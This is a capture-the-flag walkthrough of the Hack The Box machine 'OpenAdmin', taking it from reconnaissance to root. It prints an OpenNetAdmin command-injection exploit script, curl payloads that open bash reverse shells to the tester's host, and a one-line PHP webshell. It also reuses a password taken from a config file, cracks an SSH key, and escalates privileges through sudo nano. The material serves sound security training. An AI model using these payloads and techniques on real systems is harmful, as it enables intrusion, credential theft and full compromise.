OpenAdmin

Linux · Easy

10.10.10.171

Reconnaissance:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.171 

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 3.16 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 5.1 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%), Linux 3.18 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.10 seconds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.171

All 1000 scanned ports on 10.10.10.171 are in ignored states.
Not shown: 1000 closed udp ports (port-unreach)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: remote management|phone|general purpose|webcam|storage-misc
Running: Avocent embedded, Google Android 2.X, Linux 2.6.X, AXIS embedded, ZyXEL embedded
OS CPE: cpe:/o:google:android:2.2 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera cpe:/h:zyxel:nsa-210
OS details: Avocent/Cyclades ACS 6000, Android 2.2 (Linux 2.6), Linux 2.6.14 - 2.6.34, Linux 2.6.17, Linux 2.6.17 (Mandriva), Linux 2.6.32, AXIS 210A or 211 Network Camera (Linux 2.6.17), ZyXEL NSA-210 NAS device
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1013.87 seconds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.171

nmap shows two ports open, SSH on 22 and HTTP on 80

EM: Website - TCP 80

The site is just the default Apache page: http://10.10.10.171/ Apache/2.4.29 (Ubuntu) Server at 10.10.10.171 Port 80

Font scripts
- Font Awesome
- Google Font API
Miscellaneous
- Popper
Web servers
- Apache HTTP Server 2.4.29
Operating systems
- Ubuntu
JavaScript libraries
- Isotope
- AOS
- OWL Carousel
- jQuery Migrate3.0.0
- jQuery 3.3.1
- FancyBox 3.5.6
UI frameworks
- Bootstrap 4.3.1

┌──(kali💀kali)-[~]
└─$ whatweb -a3 http://10.10.10.171/ -v
WhatWeb report for http://10.10.10.171/
Status    : 200 OK
Title     : Apache2 Ubuntu Default Page: It works
IP        : 10.10.10.171
Country   : RESERVED, ZZ

Summary   : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.29 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : Apache/2.4.29 (Ubuntu) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 30 Jan 2024 01:38:52 GMT
        Server: Apache/2.4.29 (Ubuntu)
        Last-Modified: Thu, 21 Nov 2019 14:08:45 GMT
        ETag: "2aa6-597dbd5dcea8b-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3138
        Connection: close
        Content-Type: text/html

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.171

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 597dbd5dcea8b, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8047 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-01-29 21:36:08 (GMT-5) (3392 seconds)

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/.php                 (Status: 403) [Size: 277]
/music                (Status: 301) [Size: 312] [--> http://10.10.10.171/music/]
/artwork              (Status: 301) [Size: 314] [--> http://10.10.10.171/artwork/]
/sierra               (Status: 301) [Size: 313] [--> http://10.10.10.171/sierra/]
/server-status        (Status: 403) [Size: 277]

/music: The page is for a music site:

http://10.10.10.171/music/index.html
http://10.10.10.171/music/blog.html
http://10.10.10.171/music/category.html
http://10.10.10.171/music/contact.html
Main Road , No 25/11
+34 556788 3221
contact@solmusic.com

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts  
10.10.10.171	solmusic.com
10.10.10.171	openadmin.htb

http://solmusic.com/music/index.html
http://openadmin.htb/
http://10.10.10.171/sierra/

http://solmusic.com/artwork/
http://solmusic.com/artwork/index.html
http://solmusic.com/artwork/contact.html
Address: 34 Street Name, City Name Here, United States
Phone: +1 242 4942 290
Email: info@yourdomain.com

/ona: Most of the links point back to index.html, or a couple other sides on the page. But the one that really matters is the Login link at the top - it points to http://10.10.10.171/ona (which doesn’t make a whole lot of sense).

This is an instance of OpenNetAdmin: http://solmusic.com/ona/

I can see the version is 18.1.1, which it is warning is not the latest.

FOOTHOLD: Shell as www-data

Exploit POC: Searchsploit shows a remote code execution vulnerability in this version:

┌──(kali💀kali)-[~]
└─$ searchsploit OpenNetAdmin

OpenNetAdmin 13.03.01 - Remote Code Execution                           | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)            | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                             | php/webapps/47691.sh

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 47691.sh 
  Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47691
     Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh
    Codes: N/A
 Verified: False
File Type: ASCII text
Copied to: /home/kali/Desktop/47691.sh

There’s a link to this exploit on exploit-db.com. It’s super simple. The script runs an infinite bash loop taking commands and printing the output:

OpenNetAdmin 18.1.1 - Remote Code ExecutionExploit Database

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

I can test it out with just curl. One lesson I learned is that it is important to have the trailing / at the end of the url:

I can see the output of id at the end of the Module Output section. The exploit from the site just adds an echo before and after the command the user runs and then uses sed to cut out the command output and ignore the rest. I could do this myself, but I’ll just get a reverse shell and leave that as an exercise for the motivated reader.

Shell: Since I want a legit shell, I’ll use curl to push a bash reverse shell:

┌──(kali💀kali)-[~/Desktop]
└─$ curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.16.6/443 0>%261'&xajaxargs[]=ping"  http://10.10.10.171/ona/

It hangs, but in my nc listener, I’ve got a shell:

┌──(kali💀kali)-[~]
└─$ nc -lnvp 443

www-data@openadmin:/opt/ona/www$ whoami
www-data

www-data@openadmin:/opt/ona/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@openadmin:/opt/ona/www$ sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: error initializing audit plugin sudoers_audit

www-data@openadmin:/opt/ona/www$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Priv Esc: www-data –> jimmy

Enumeration: On the box, I can see two user home directories, but I can’t read into either of them as www-data:

www-data@openadmin://$ cd /home
www-data@openadmin:/home$ ls
jimmy
joanna

www-data@openadmin:/home$ find .
.
./jimmy
find: './jimmy': Permission denied
./joanna
find: './joanna': Permission denied

Heading back to /var/www, there are three directories:

www-data@openadmin:/home$ cd /var/www
www-data@openadmin:/var/www$ ls
html
internal
ona

html has the various sites:

www-data@openadmin:/var/www/html$ ls
artwork
index.html
marga
music
ona
sierra

I hadn’t found the marga one. But it looks like the rest of the dummy sites. internal is owned by jimmy, and I can’t access it:

www-data@openadmin:/var/www$ ls -la
ls -la
total 16
drwxr-xr-x  4 root     root     4096 Nov 22  2019 .
drwxr-xr-x 14 root     root     4096 Nov 21  2019 ..
drwxr-xr-x  6 www-data www-data 4096 Nov 22  2019 html
drwxrwx---  2 jimmy    internal 4096 Nov 23  2019 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www

www-data@openadmin:/var/www$ cd internal/
bash: cd: internal/: Permission denied

Both ona and html/onaare links to /opt/ona/www.

ONA DB: Since OpenNetAdmin was the only site I found that seemed like it would require any kind of DB connection, went looking in there. Reading the config files, I eventually found

/var/www/html/ona/local/config/database_settings.inc.php

www-data@openadmin:/var/www$ cd /var/www/html/ona/local/config

www-data@openadmin:/var/www/html/ona/local/config$ cat database_settings.inc.php
<tml/ona/local/config$ cat database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

I figured I’d check for password reuse, and it worked for jimmy:

www-data@openadmin:/var/www/html/ona$ python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data@openadmin:/var/www/html/ona$ su jimmy
Password: n1nj4W4rri0R!

jimmy@openadmin:/opt/ona/www$ whoami
jimmy

jimmy@openadmin:/opt/ona/www$ id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)

No user.txt in jimmy’s home directory. I suspect I need to pivot to joanna.

Priv Esc: jimmy –> joanna

Enumeration:

As jimmy, I can now access /var/www/internal:

jimmy@openadmin:/var/www/internal$ ls -l
total 24
-rw-rw-r-- 1 jimmy jimmy     341 Jan 17 21:15 headers
-rwxrwxr-x 1 jimmy jimmy    3229 Jan 17 19:44 index_backup.php
-rwxrwxr-x 1 jimmy internal 3094 Jan 17 21:12 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy jimmy     339 Jan 17 20:13 main_backup.php
-rwxrwxr-x 1 jimmy internal  339 Jan 17 20:39 main.php

I can do some digging to see if this site is running, and how it’s hosted (different vhost, or path, or port) by looking at the configs in /etc/apache2/sites-enabled:

jimmy@openadmin:/etc/apache2/sites-enabled$ ls
internal.conf  openadmin.conf

openadmin.conf shows the site I found, listening on port 80, with root at /var/www/html (comment lines removed):

jimmy@openadmin:/etc/apache2/sites-enabled$ cat openadmin.conf 
<VirtualHost *:80>
        ServerName openadmin.htb

        ServerAdmin jimmy@openadmin.htb
        DocumentRoot /var/www/html

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

internal.conf shows a listener on localhost:52846:

jimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf 
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

It’s also interesting that it runs as jonanna.

Internal Site: I’ll reconnect as jimmy over SSH with a tunnel so that I can reach the internal site:

┌──(kali💀kali)-[~]
└─$ ssh jimmy@10.10.10.171 -L 52846:localhost:52846
n1nj4W4rri0R!

Now I can visit http://127.0.0.1:52846/ and get the page: http://127.0.0.1:52846/

Path 1: Webshell

The initial way I solved this was to write a webshell into the root directory for this folder:

jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php
jimmy@openadmin:/var/www/internal$ echo '<?php system($_GET["cmd"]); ?>' > exodus.php

Now I can access that and get execution as joanna:

┌──(kali💀kali)-[~]
└─$ curl http://127.0.0.1:52846/exodus.php?cmd=id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

To get a shell, I can start nc and curl:

┌──(kali💀kali)-[~]
└─$ curl 'http://127.0.0.1:52846/exodus.php?0xdf=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.6/443%200%3E%261%27'

┌──(kali💀kali)-[~]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.171] 53234

joanna@openadmin:/var/www/internal$ whoami
joanna

joanna@openadmin:/var/www/internal$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

joanna@openadmin:/var/www/internal$ ls
exodus.php
index.php
logout.php
main.php

joanna@openadmin:/var/www/internal$ cd ~
joanna@openadmin:/home/joanna$ ls 
user.txt

joanna@openadmin:/home/joanna$ cat user.txt
2d9e3e---------------------------

Path 2: Log In and SSH

Log In and Get Key: The site above required username and password. If I check index.php, I can see the hardcoded username and password in the php source:

      <h2>Enter Username and Password</h2>
      <div class = "container form-signin">
        <h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
          <?php
            $msg = '';

            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';
              }
            }
         ?>

http://127.0.0.1:52846/main.php

Decrypt Key: Then it breaks in john instantly:

┌──(kali💀kali)-[~/Desktop]
└─$ nano hash    

┌──(kali💀kali)-[~/Desktop]
└─$ ssh2john hash > id_rsa.hash

┌──(kali💀kali)-[~/Desktop]
└─$ cat id_rsa.hash 
hash:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d

┌──(kali💀kali)-[~/Desktop]
└─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (hash)

┌──(kali💀kali)-[~/Desktop]
└─$ chmod 700 hash   

┌──(kali💀kali)-[~/Desktop]
└─$ ssh -i hash joanna@10.10.10.171
Enter passphrase for key 'hash': bloodninjas

Priv: joanna –> root

Enumeration: Always check sudo on HTB, and it pays off here:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH
    XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

sudo nano: gtfobins has a page on nano. The path to get shell from sudo is as follows:

nano | GTFOBinsgtfobins.github.io

sudo nano
^R^X
reset; sh 1>&0 2>&0

Not that it matters, but /opt/priv is an empty file:

joanna@openadmin:/opt$ ls -la
drwxr-xr-x  3 root     root     4096 Jan  4  2020 .
drwxr-xr-x 24 root     root     4096 Aug 17  2021 ..
drwxr-x---  7 www-data www-data 4096 Nov 21  2019 ona
-rw-r--r--  1 root     root        0 Nov 22  2019 priv

joanna@openadmin:/opt$ ls -l priv 
-rw-r--r-- 1 root root 0 Nov 22  2019 priv

I’ll run sudo /bin/nano /opt/priv and be dropped into nano:

Now I’ll hit Ctrl+r to read a file, and the menu at the bottom pops up:

Ctrl+x is “Execute Command”. Typing that gives a prompt “Command to execute: “. If I just enter /bin/sh, it will freeze, because the stdin/stdout/stderr are messed up. That’s what the reset; /bin/sh 1>&0 2>&0 fixes. When I run it, the remnants of nano are still there, but there’s a # as a prompt:

If I enter id, it works:

joanna@openadmin:/opt$ sudo /bin/nano /opt/priv

# id
uid=0(root) gid=0(root) groups=0(root)

# whoami
root

# cat /root/root.txt
a6a54----------------------------

PreviousSoccer NextLegacy

Last updated 1 year ago

hashtag Reconnaissance:

hashtag EM: Website - TCP 80

hashtag FOOTHOLD: Shell as www-data

hashtag Priv Esc: www-data –> jimmy

hashtag Priv Esc: jimmy –> joanna

hashtag Path 1: Webshell

hashtag Path 2: Log In and SSH

hashtag Priv: joanna –> root